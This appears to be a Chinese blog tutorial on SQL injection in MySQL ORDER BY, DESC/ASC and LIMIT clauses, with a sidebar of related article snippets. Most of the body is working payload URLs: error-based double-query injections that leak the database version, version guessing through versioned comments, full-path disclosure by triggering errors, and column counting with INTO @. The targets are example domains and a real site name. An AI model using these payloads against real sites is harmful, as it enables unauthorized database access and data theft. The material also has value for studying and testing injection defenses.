order by/limit 注入

最新推荐文章于 2024-05-15 02:28:19 发布
最新推荐文章于 2024-05-15 02:28:19 发布
阅读量1.9k 收藏
点赞数
分类专栏: 网络安全 文章标签: order by limit sql注入
类似的代码
php code
SELET * FROM page WHERE id=1 ORDER BY id [参数] ASC [参数] LIMIT 10,10 [参数]
[参数] – 为存在注入的参数
我们不能在这注入上使用union,所以我们只能使用其他我们可以利用的
 
在order by id [参数] 之后使用双重查询
 
假设有以下网站
code:
http://www.domain.com/include/products.php?sb=id–这是id是在order by [id]的一个注入点
 
我知道我可以利用union在另外一个注入点,我要做这样的测试
在order by之后,我们唯一不能使用——unoin,having,where,and还有一些无关紧要的关键字
我们可以使用and进行双重查询
Code:
 
http://www.domain.com/include/products.php?sb=id and (select count(*) from products group by concat(version(),0x27202020,floor(rand(0)*2-1)))--'5.0.95-community'
(我用’products’这个表,因为我可以从这个表中看到存在的错误,如果你看不到表,可以使用’information_schema.columns’)
 
在desc/asc [参数] 之后使用双重查询
 
假设有以下网站
code:
http://www.domain.com/include/products.php?sb=id–这是id是在desc [id]的一个注入点
在desc/asc之后它的小问题,因为我们不可以使用——union,having,where,and,or,xor,*,>,所以我们不能执行查询命令
所以我们只要加上一个’,'就可以和语句进行查询了
Code:
 
http://www.domain.com/include/products.php?sb=id desc,(select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1)))'5.0.95-community'
假设注入如下
PHP Code:
SELECT * FROM page WHERE id=1 ORDER BY [参数] id
添加’1′就可以和最初一样注入了
Code:
1 and (select count(*) from products group by concat(version(),0×27202020,floor(rand(0)*2-1)))–
在limit 10,10 [参数]之后
使用一些技巧
 
假设有以下网址
Code:
 
http://www.2cto.com /include/products.php?rw=10
–注入点在是limit 10这样的形式
当注入点在limit之后,我们什么都做不了,只有以下这些命令
 
offset,into,into outfile/dumpfile,/*!*/,for update,lock in share mode
所以我们想试试我们能利用的
如下:
获取版本
爆出路径
获取字段总数
 
获取版本
我们可以利用评论去获取mysql的版本
我们可以手工去猜它,如果它返回正确,那么页面将不会载入,就像盲注一样,但是有区别
Code:
http://www.domain.com/include/products.php?rw=10 /*!50094aaaa*/页面没有载入说明版本大于5.00.94
Code:
http://www.domain.com/include/products.php?rw=10 /*!50096aaaa*/页面没有载入说明版本小雨5.00.96
Code:
http://www.domain.com/include/products.php?rw=10 /*!50095aaaa*/页面没有载入说明版本等于5.00.95
 
爆出完整路径,我们可以用0或/**/这样的like格式,就可以爆出完整的路径,即便是mysql上报错也可以
Code:
 
http://www.domain.com/include/products.php?rw=0–这是完整的命令
 
PHP Code:
select * from….limit 0,0
 
我们也可以这样
Code:
 
http://www.domain.com/include/products.php?rw=/**/1
提示报错
 
Division by zero in /home/teletec/public_html/include/products.php on line 164
获取字段总数
使用into
它不会真正帮助到我们,但是它是一个不错的技巧
假设我们有以下的网站
Code:
 
http://www.domain.com/include/products.php?rw=10--注射点在like的参数里
我们可以这样获取到字段总数
Code:
 
http://www.domain.com/include/products.php?rw=10 into @
提示报错
error 1222.
not 1 column.
继续递增@
Code:
 
http://www.domain.com/include/products.php?rw=10 into @,@
……
……
http://www.domain.com/include/products.php?rw=10 into @,@,[n..]
一直到返回以下这样的错误
 
error 1172 "Result consisted of more than one row"
则可以确定有多少个字段
 
希望大家在这些技巧里能学到东西。
小小阿金
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF从入门到提升(八)desc注入及相关例题分享
anquanniu的博客
09-03 1042
desc注入及相关例题分享 desc是函数describe的简写,一般用来提供和表相关的列信息来查看表的结构。 很多CTF赛题考点都是运用它的一些我们不太熟悉的特性或者说使用方法。常规来讲desc后面跟的是表名,但事实远不止于此,除了表名还可以有第二个参数。 而且在第二个参数中,它除了列名之外,还可以是包含sql通配符的字符串。 演示一下: 它会出一个表的一个结构。 下一个参数去跟一个列名: ...
sql注入总结--详细
weixin_44576725的博客
11-19 5822
文章目录SQL注入总结1、原理2、数据库基础系统函数字符串连接函数mysql注释符union 操作符的介绍order by介绍字符串编码数据库结构导入导出相关操作增删改函数3、判断是否存在SQL注入4、回显注入(联合注入)查询字段数目查询库名查询表名查询字段名查询字段值获取WebShell5、盲注sql注入截取字符串常用函数REGEXP正则表达式LIKE 匹配布尔盲注布尔盲注的流程脚本时间盲注DNSLog盲注6、堆叠注入7、报错注入数据溢出xpath语法错误主键重复一些特性8、二次注入9、ORDER BY
desc相关注入
坚持硬核
01-30 795
{DESCRIBE | DESC} table_name [col_name|wlid] DESCRIBE 提供有关一个表的列信息 col_name 可以是一个 列名或是一个包含 SQL 通配符字符 “%” 和 “_” 的字符 串。 desc 表名之后跟列名 desc 表名 之后 跟一个不存在的列名: 例题: 通过目录扫描发现了该站点的一个源文件index.php~ 因为index.php~ 没有被nginx解析 所以可以看到源代码: mysql中反引号的作用: 比如你想要.
CTF从入门到提升(八)desc注入及相关例题分享_desc排序注入(1)
最新发布
m0_60707579的博客
05-15 495
desc是函数describe的简写,一般用来提供和表相关的列信息来查看表的结构。16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?11、什么叫网站灰度发布?
【ctf】sql注入——desc注入
wlllllianqing的博客
10-04 552
desc注入 desc函数是用来提供一个表的列信息 desc 表名 列名 describe 表名 列名 这里提到一个点,当我们在mysql中想要使用已经被定义的字段作为数据库或表名时该怎么办? 直接使用会报错,这里就要用到一个符号 反引号:`` 当我们将表名和列名使用引号时,发现会报错,这里只能使用反引号; 而且我们发现,如果我们查询一个不存在的列名时,该语句仍然会执行,只是会返回empty,那么这也是一个绕过或者注入的思路; ...
Sql 查询最新十条数据和查询最新一条数据
シ❤゛甜虾的个人博客
09-30 1万+
一、Sql 查询最新十条数据 select * from 表名 order by id(主键) desc limit 10 示例: SELECT * FROM gold_value.chow_tai_fook order by id desc limit 10; 返回结果 : 二、Sql 查询最新十条数据并按时间排序 SELECT * FROM (select * from 表名 order by id desc limit 10) tempTable ORDER BY id(排序字段
[ 漏洞挖掘基础篇三 ] 漏洞挖掘之fuzz测试
qq_51577576的博客
04-29 7884
🍬博主介绍 👨‍🎓 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋 🙏作者水平有限,欢迎各位大佬指点,相互学习进步! 中华人民共和国网络安全法 第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动:不得提供专门用于从事侵入网络、干扰网络正常功能...
sql注入讲解ppt.pptx
08-10
3. ORDER BY:使用 ORDER BY keyword 来排序查询结果。 4. LIMIT 和 OFFSET:使用 LIMIT 和 OFFSET keyword 来限制查询结果。 八、SQL 注入基本步骤: 1. 注入点测试:检测 SQL 注入的可能性。 2. 查询字段数:...
mysql注入-sqlilabs靶场注入
10-15
例如,使用UNION查询在已知列数的场景下合并结果,使用注释符号来隐藏部分SQL代码,或者利用ORDER BY和LIMIT来枚举列数和行数。此外,还有二进制注入,通过ASCII值转换来插入特殊字符,以及使用存储过程和函数来执行...
PHP+MYSQL 注入靶场
04-26
例如,了解如何使用`UNION SELECT`、`LIKE`、`OR`等操作符构造恶意查询,或者如何通过`LIMIT`和`ORDER BY`来逐行读取数据。 在靶场的实践中,你可以: 1. 分析`index.php`等PHP文件,找出可能的注入点。 2. 模拟...
php手工注入.doc
11-29
接着,通过`Order by 47`和`Order by 48`的测试,确定了数据库字段的数量为47个。 进一步,攻击者利用`UNION SELECT`构造了一条查询,显示了页面上的部分字段。他们使用了几个常见的MySQL函数,如`version()`来获取...
MySQL常用关键字使用方法(随时补充)
轩1024的博客
09-08 1054
MySQL常用关键字 下面列举一些常见的关键字使用方法,及注意事项。 去重Distinct DISTINCT+列名,表示按该列去重 DISTINCT 需要放到所有列名的前面,否则会报错 DISTINCT 后面加多列,其实是对后面所有列名的组合进行去重 排序Group By 排序的列名:ORDER BY 后面可以有一个或多个列名,如果是多个列名进行排序,会按照后面第一个列先进行排序,当第一列的值相同的时候,再按照第二列进行排序,以此类推。 排序的顺序:ORDER BY 后面可以注明排序规则,AS
宽字节注入详解
qq_45927819的博客
03-26 1万+
文章目录1、涉及函数2、原理分析3、实战南邮nctf-sql injection 3sql-labs-32关 1、涉及函数 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符 mysql_escape_string() 转义一个字符串 2、原理分析 先了解一下什么是窄、宽字节已经常见宽字节编码: 当某字符的大小为一个字节时,称其字符为窄字节. 当某字符的大小为两个字节时,称
关于MySQL注入点的问题
春日野穹
01-24 322
order by后注入 注入点在 order by后面,order by 后面不能带union select,此处可以利用报错信息进行注入 order by后不能参数化,不只order by,凡是字符串但又不能加引号的位置都不能参数化;包括sql关键字、库名表名字段名函数名等等,否则就会产生了语法错误 order by后不能参数化,可关注orderby、sort参数 desc或者asc(升序or降序排列)显示结果不同,则表明可以注入 mysql> select * from users order b
desc巧用及反引号 ` SQL注入——【61dctf】 inject writeup
Ve99tr’s Blog
09-02 1844
题目链接 :http://web.jarvisoj.com:32794/ 描述 进入页面,发现只有 flag{xxx} 题目hint:先找到源码~ 源码泄露 使用后台目录扫描工具御剑进行后台扫描 源码泄露: http://web.jarvisoj.com:32794/index.php~ F12查看器得到泄露的源码 <?php require("config.php"); $ta...
玩得一手好注入order by排序篇
weixin_34107955的博客
01-30 1057
看了之前Gr36_前辈在先知上的议题,其中有提到排序注入,这个在最近经常遇到这样的问题,所以先总结下order by 排序注入的知识。                             0×00 背景 看了之前Gr36_前辈在先知上的议题,其中有提到排序注入,这个在最近经常遇到这样的问题,所以先总结下order by 排序注入的知识。    0×01 环境信息 测试环境:操作系统ubunt...
mysql order by注入技巧
一个码农的笔记
11-05 4978
select user from user order by user,If((1=1),1,(select user from mysql.user)) desc; http://www.2cto.com/Article/201305/209335.html 记一下,免得忘了
sql order by,desc和limit使用(mysql)
热门推荐
1_bit 的博客
03-01 6万+
(。ŏ_ŏ) 首先我们来看一个表: 在此我们要进行排序,按降序排序,就是从大到小。然后我们只要查询前2条数据。 意思就是我们需要把这个表从大到小排序后,取前两条,那么我们就需要使用到order by 和desc 和limit。那么我们的命令就是如下命令(稍后解释): SELECT * FROM table1 ORDER BY age1 DESC LIMIT 2 随后我们运行后,得到以下结
这种语句进行防止sql注入? $query= $this->o_database->query("select $field from zx_ask $where order by $order $limit")->fetchAll();
03-30
$stmt = $this->o_database->prepare("SELECT $field FROM zx_ask $where ORDER BY $order $limit"); $stmt->execute($params); $result = $stmt->fetchAll(); ``` 其中,`$params` 是一个关联数组,包含所有需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值